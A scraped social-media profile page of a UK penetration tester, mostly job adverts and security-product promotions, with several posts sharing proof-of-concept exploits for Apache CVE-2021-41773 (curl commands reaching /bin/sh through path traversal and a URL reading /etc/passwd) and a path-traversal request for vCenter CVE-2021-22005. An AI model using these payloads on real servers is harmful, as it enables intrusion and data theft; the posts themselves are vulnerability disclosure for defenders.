Olivia
Online
dusty
@DustySTS
I like to hack stuff :)
UK
Joined August 2010
4.6K Following
1K Followers
3.5K Posts
@rovercrc Quit it with your bipolar crypto predictions, jheez 🤣🤣
The company I work for are hiring security consultants, if you would like to join the team at @RootshellSec drop me a DM.
We’re looking for a Penetration Tester to join the Rootshell RedForce Testing Team. Find out more and apply today: https://t.co/Bz7Y34rr80
#pentesting #penetrationtesting #hiringnow
@SussexRoadsPol Absolute idiots @SussexRoadsPol how about you do some real police work for once ay?
Who to follow
DeepBlue Security & Intelligence
@DeepBlueInfoSec
Cyber security solutions for companies that want to keep a grip on their data. Always and everywhere.
john fitzpatrick
@j0hn__f
CyberSecurity | Lab539 and HPCsec | HPC | Supercomputers | TCDO | formerly MWRlabs & Jumpsec | @[email protected]
jcran 
@jcran
knowledge seeker
Looking for a new opportunity in #cybersecurity? Come and join our innovative and fast-paced Development Team, who are responsible for our industry-leading Prism Platform: https://t.co/BmtFBr7D02
#softwareengineer #softwaredeveloper #fullstacksoftwareengineer #newjob #hiringnow
Anyone looking for a new challenge? We are currently hiring and looking for hackers with unique talents. We have some awesome clients and some really exciting in-house stuff going on. Drop into my DMs if you are looking for an exciting new challenge..
We’re looking for a Contracts and Administration Manager to join our growing team! Find out more about the role: https://t.co/CZ1izzNyhY
#newjob #techjobs #hiringnow
Exploiting CVE-2021-41773 to execute commands is incredibly easy once mod-cgi has been enabled...
curl --data "A=|id>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
and "id" runs ;-)
Oh good, CVE-2021-41773 is in fact also RCE providing mod-cgi is enabled. An attacker can call any binary on the system and supply environment variables (that's how CGI works!) - if they can upload a file and set +x permissions, they can trivially run commands as Apache user.
CVE-2021-41773 POC
127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
Patch urgently.
Prism Platform enriches your vulnerability data, giving you a greater understanding of your current threat profile. Watch a demo today: https://t.co/NyqPiHITcI
#vulnerabilitymanagement #cybersecurity #infosecurity #CISO
Fuzzing-101 : Do you want to learn how to fuzz like a real expert, but don't know how to start? : https://t.co/V2xPFRL17k credits @Nosoynadiemas
Prism Platform’s latest release makes it effortless to manage, prioritise, and track assets, removing the need for countless manual tasks. Read all about the new features: https://t.co/66aks3wuix
#cybersecurity #infosec #ciso
Prism Platform’s live results feed is just one way it helps you address critical issues faster than ever before. Find out more: https://t.co/HAqbJ6Hyem
#remediationmanagement #infosecurity #ciso
write an EXE into any file's NTFS stream, and run it as a process. We can delete the file, even the process is still running :)
it's cool how Windows manage file locks
vCenter Server Analytics service Malicious file upload (CVE-2021-22005)
Current form the code is missing the important part leading to RCE.
POST
/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
https://t.co/eeO8YNs4by
This is a bit dated, but it's a very well written article on the vulnerability research process, from setting up the environment to target selection, and from bug hunting via fuzzing to exploitation. Very recommended reading.
https://t.co/mDJVB7iywp
Best of Linux-Privilege-Escalation
https://t.co/avdMPrZVTX
#infosec #ctf #oscp #cybersecurity #Pentesting
Last Seen Users on Sotwe
موجب فحل سوداني
Seen from Egypt
Adana’nın İncisi
Seen from Turkey
เย็ดเก่ง ด้านมืด ขึ้นเก่ง
Seen from Thailand
rosa morles
Seen from Singapore
SkyArf
Seen from Malaysia
Pirat_Nation 🔴
Seen from Brazil
Mhmt &…
Seen from Turkey
🌸GOON QUEEN🌸
⚓SunnyS.⚓🇲🇽 🇺🇦
Seen from Thailand
𝕐𝕒𝕤𝕞𝕚𝕟𝕖 💃🏻💋
Seen from Germany
Most Popular Users
Elon Musk
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.6M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.2M followers
Taylor Swift
@taylorswift13
81M followers
Lady Gaga
@ladygaga
72.6M followers
Kim Kardashian
@kimkardashian
69.6M followers
Virat Kohli
@imvkohli
69.1M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.6M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.8M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.3M followers